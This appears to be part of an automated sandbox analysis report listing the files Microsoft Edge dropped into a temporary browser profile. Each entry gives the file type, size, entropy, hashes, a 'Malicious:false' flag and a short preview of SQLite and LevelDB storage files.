                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):155648
                                                                                                                                                              Entropy (8bit):0.5407252242845243
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                              MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                              SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                              SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                              SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):28672
                                                                                                                                                              Entropy (8bit):0.33890226319329847
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:TLMfly7aoxrRGcAkSQdC6ae1//fxEjkE/RFL2iFV1eHFxOUwa5qgufTsZ75fOSI:TLYcjr0+Pdajk+FZH1W6UwccI5fBI
                                                                                                                                                              MD5:971F4C153D386AC7ED39363C31E854FC
                                                                                                                                                              SHA1:339841CA0088C9EABDE4AACC8567D2289CCB9544
                                                                                                                                                              SHA-256:B6468DA6EC0EAE580B251692CFE24620D39412954421BBFDECB13EF21BE7BC88
                                                                                                                                                              SHA-512:1A4DD0C2BE163AAB3B81D63DEB4A7DB6421612A6CF1A5685951F86B7D5A40B67FC6585B7E52AA0CC20FF47349F15DFF0C9038086E3A7C78AE0FFBEE6D8AA7F7E
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):16
                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):16
                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):273
                                                                                                                                                              Entropy (8bit):5.280718689372398
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6:HEFStAAB1qLTwi23fQr/0a2jM8B2KLlVEFSQUXN+q2PqLTwi23fQr/0a2jMGIFUv:kotAAowZC8jFLsoQRv8wZC8EFUv
                                                                                                                                                              MD5:48EF090AEB4C6900922CD7F4A20BED0D
                                                                                                                                                              SHA1:A590F7DC379A13166E83C629D91273BCFAE55689
                                                                                                                                                              SHA-256:362D50404EFAAD719E82DA14A836553793EB9FE66878FD2F81B2415436F31D63
                                                                                                                                                              SHA-512:CF511DD6D4D544C302BFF379DFF56C457A228B4F4A964136277D4DEE72E932321B2482D1E7EF973B0F15D569E1BFFFEB40DB14EB1426D13AC03C5A866062C954
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:2024/11/21-05:27:21.396 12b8 Creating DB C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Local Storage\leveldb since it was missing..2024/11/21-05:27:21.529 12b8 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Local Storage\leveldb/MANIFEST-000001.
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):41
                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):51200
                                                                                                                                                              Entropy (8bit):0.8746135976761988
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:JSON data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2
                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:[]
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):20480
                                                                                                                                                              Entropy (8bit):0.6732424250451717
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):12288
                                                                                                                                                              Entropy (8bit):0.3237637357343357
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6:l9bNFlEuWk8T/l5qKZwkvAngLusiOImWtz0vlWmW8QeZa5qguxtqlyup6YZ75fOV:TLiuWkYl0KONFxOUwa5qguWfpbZ75fOV
                                                                                                                                                              MD5:3EF849ABC9E84C1D19566A9128442C47
                                                                                                                                                              SHA1:E9C70A5823A7A46330A18D51A4413ECFDAF10753
                                                                                                                                                              SHA-256:301CD0F39EB7BBFA37303A5D482614B67A78979F5D761520EDFB16C4BA77EE92
                                                                                                                                                              SHA-512:DFD248A745C1960BFB792FC59F90724DD937D5D431F28E1F6CCBC0F55E551B0818408AD353B88DC83439AF2D7B249C9576B1F1F66838B59865EA9F5644CC9EBF
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):4616
                                                                                                                                                              Entropy (8bit):0.49635072460257995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6:blgPg9bNFlEuWk8T/l5qKZwkvAngLusiOImWtz0vlWmW8QeZag2:bl4qLiuWkYl0KONFxOUwaV
                                                                                                                                                              MD5:6088AB04C8224CACBFBD9C37421B4D6B
                                                                                                                                                              SHA1:86C85388A9965B16B2E123592F05D29B3D87502C
                                                                                                                                                              SHA-256:E0ED3591992E6B81082C97595407D4BAAC82E560A0B3DF17A413BBE139F0EEEA
                                                                                                                                                              SHA-512:08E19800E501963B3F96732BE25AFDDD650A6295873487AD53F23DC125ABEDE5B0525BEDFF20807366CBF34C00E7CD5C188DD179CC7F31524D765E90CA358F98
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:JSON data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2
                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:[]
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:JSON data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2
                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:[]
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):36864
                                                                                                                                                              Entropy (8bit):0.36515621748816035
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:TLH3lIIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:Tb31DtX5nDOvyKDhU1cSB
                                                                                                                                                              MD5:25363ADC3C9D98BAD1A33D0792405CBF
                                                                                                                                                              SHA1:D06E343087D86EF1A06F7479D81B26C90A60B5C3
                                                                                                                                                              SHA-256:6E019B8B9E389216D5BDF1F2FE63F41EF98E71DA101F2A6BE04F41CC5954532D
                                                                                                                                                              SHA-512:CF7EEE35D0E00945AF221BEC531E8BF06C08880DA00BD103FA561BC069D7C6F955CBA3C1C152A4884601E5A670B7487D39B4AE9A4D554ED8C14F129A74E555F7
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):20480
                                                                                                                                                              Entropy (8bit):0.46731661083066856
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:TL1QAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3is25q0S9K0xHZ75fOV:TLiOUOq0afDdWec9sJf5Q7J5fc
                                                                                                                                                              MD5:E93ACF0820CA08E5A5D2D159729F70E3
                                                                                                                                                              SHA1:2C1A4D4924B9AEC1A796F108607404B000877C5D
                                                                                                                                                              SHA-256:F2267FDA7F45499F7A01186B75CEFB799F8D2BC97E2E9B5068952D477294302C
                                                                                                                                                              SHA-512:3BF36C20E04DCF1C16DC794E272F82F68B0DE43F16B4A9746B63B6D6BBC953B00BD7111CDA7AFE85CEBB2C447145483A382B15E2B0A5B36026C3441635D4E50C
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):182
                                                                                                                                                              Entropy (8bit):4.2629097520179995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:RGXKRjg0QwVIWRKXECSAV6jDyhjgHGAW+LB2Z4MKLFE1SwhiFAfXQmWyKBPMwRgK:z3frsUpAQQgHGwB26MK8Sw06fXQmWtRT
                                                                                                                                                              MD5:643E00B0186AA80523F8A6BED550A925
                                                                                                                                                              SHA1:EC4056125D6F1A8890FFE01BFFC973C2F6ABD115
                                                                                                                                                              SHA-256:A0C9ABAE18599F0A65FC654AD36251F6330794BEA66B718A09D8B297F3E38E87
                                                                                                                                                              SHA-512:D91A934EAF7D9D669B8AD4452234DE6B23D15237CB4D251F2C78C8339CEE7B4F9BA6B8597E35FE8C81B3D6F64AE707C68FF492903C0EDC3E4BAF2C6B747E247D
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:Microsoft Edge settings and storage represent user-selected preferences and information and MUST not be extracted, overwritten or modified except through Microsoft Edge defined APIs.
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):16
                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):61
                                                                                                                                                              Entropy (8bit):3.7273991737283296
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:S8ltHlS+QUl1ASEGhTFl:S85aEFl
                                                                                                                                                              MD5:9F7EADC15E13D0608B4E4D590499AE2E
                                                                                                                                                              SHA1:AFB27F5C20B117031328E12DD3111A7681FF8DB5
                                                                                                                                                              SHA-256:5C3A5B578AB9FE853EAD7040BC161929EA4F6902073BA2B8BB84487622B98923
                                                                                                                                                              SHA-512:88455784C705F565C70FA0A549C54E2492976E14643E9DD0A8E58C560D003914313DF483F096BD33EC718AEEC7667B8DE063A73627AA3436BA6E7E562E565B3F
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:*...#................version.1..namespace-..&f...............
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):261
                                                                                                                                                              Entropy (8bit):5.194855178635482
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6:HEFS2s1qLTwi23fQr/DQM72KLlVEFSEFKn+q2PqLTwi23fQr/DQMxIFUv:ko2FwZC/LsoEF/v8wZCCFUv
                                                                                                                                                              MD5:6934DFD99E4BB8E0DFEEA0F40821919C
                                                                                                                                                              SHA1:834F22DD97A8806664ED6DEA011851E63F8ED5D8
                                                                                                                                                              SHA-256:3FCD11A0B7923D51531DFA4019A7873CBE9083A7ED030676CDBB6B9ED3478603
                                                                                                                                                              SHA-512:946391CF3079897DF41FFB289313736FF2E75142D3AE31CEC239A45EFD71D8184DB1218B16E6C8795BBDCAB744D511A83F9D6E294688704491CF94375946B4AB
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:2024/11/21-05:27:21.714 1608 Creating DB C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Session Storage since it was missing..2024/11/21-05:27:21.763 1608 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Session Storage/MANIFEST-000001.
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):41
                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):40
                                                                                                                                                              Entropy (8bit):3.473726825238924
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:41tt0diERGn:et084G
                                                                                                                                                              MD5:148079685E25097536785F4536AF014B
                                                                                                                                                              SHA1:C5FF5B1B69487A9DD4D244D11BBAFA91708C1A41
                                                                                                                                                              SHA-256:F096BC366A931FBA656BDCD77B24AF15A5F29FC53281A727C79F82C608ECFAB8
                                                                                                                                                              SHA-512:C2556034EA51ABFBC172EB62FF11F5AC45C317F84F39D4B9E3DDBD0190DA6EF7FA03FE63631B97AB806430442974A07F8E81B5F7DC52D9F2FCDC669ADCA8D91F
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.On.!................database_metadata.1
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):16
                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):289
                                                                                                                                                              Entropy (8bit):5.044488801382113
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6:HEFSQXs1qLTwi23fQr/TUh2gr52KLlVEFSRnM+q2PqLTwi23fQr/TUh2ghZIFUv:koCFwZCIhHJLsoRM+v8wZCIhHh2FUv
                                                                                                                                                              MD5:3BC5F6ED6DD397EBAA82220D2BB5465B
                                                                                                                                                              SHA1:2688D44339C4F52A01BDB3AE2F18D16A2105329D
                                                                                                                                                              SHA-256:2E37313374DC85D2A23B5E4C2DEE81D316318EE2BFAFC11204C62C9DE15F21A4
                                                                                                                                                              SHA-512:09C3468D72E4CFB95D164391510D25B22BFE736FB4CC3EF06A6224233091DE00782E080405E28D9E93CC949FB93A330227C0B9A81BCC31CA655C0EB1DDAD27D9
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:2024/11/21-05:27:21.041 1e1c Creating DB C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Site Characteristics Database since it was missing..2024/11/21-05:27:21.222 1e1c Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Site Characteristics Database/MANIFEST-000001.
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):41
                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):16
                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):46
                                                                                                                                                              Entropy (8bit):4.019797536844534
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:sLollttz6sjlGXU2tkn:qolXtWswXU2tkn
                                                                                                                                                              MD5:90881C9C26F29FCA29815A08BA858544
                                                                                                                                                              SHA1:06FEE974987B91D82C2839A4BB12991FA99E1BDD
                                                                                                                                                              SHA-256:A2CA52E34B6138624AC2DD20349CDE28482143B837DB40A7F0FBDA023077C26A
                                                                                                                                                              SHA-512:15F7F8197B4FC46C4C5C2570FB1F6DD73CB125F9EE53DFA67F5A0D944543C5347BDAB5CCE95E91DD6C948C9023E23C7F9D76CFF990E623178C92F8D49150A625
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:...n'................_mts_schema_descriptor...
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):16
                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):265
                                                                                                                                                              Entropy (8bit):5.197944585609627
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6:HEFSMI81qLTwi23fQr/Zx2KLlVEFSX+q2PqLTwi23fQr/RIFUv:kopVwZCBVLsoX+v8wZCmFUv
                                                                                                                                                              MD5:15A3F600FD984C22762C1A6125914483
                                                                                                                                                              SHA1:41F2B9F7BADF38E5735C27E37027A1FC15A30D5F
                                                                                                                                                              SHA-256:B6F158498D492CC120F11C3879320FCCBF3157A04661E07DE787B3F66EBEF197
                                                                                                                                                              SHA-512:0B651B4579D6501CCF17F92BB2BC10BCB2ED692F4E298A292668F52E7A44A15EF5BFBE4F46BE611BECEE9141984F2C08649171A74832AD08A66FF098B8FFE3B0
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:2024/11/21-05:27:21.102 1dcc Creating DB C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Sync Data\LevelDB since it was missing..2024/11/21-05:27:21.130 1dcc Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Sync Data\LevelDB/MANIFEST-000001.
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:OpenPGP Secret Key
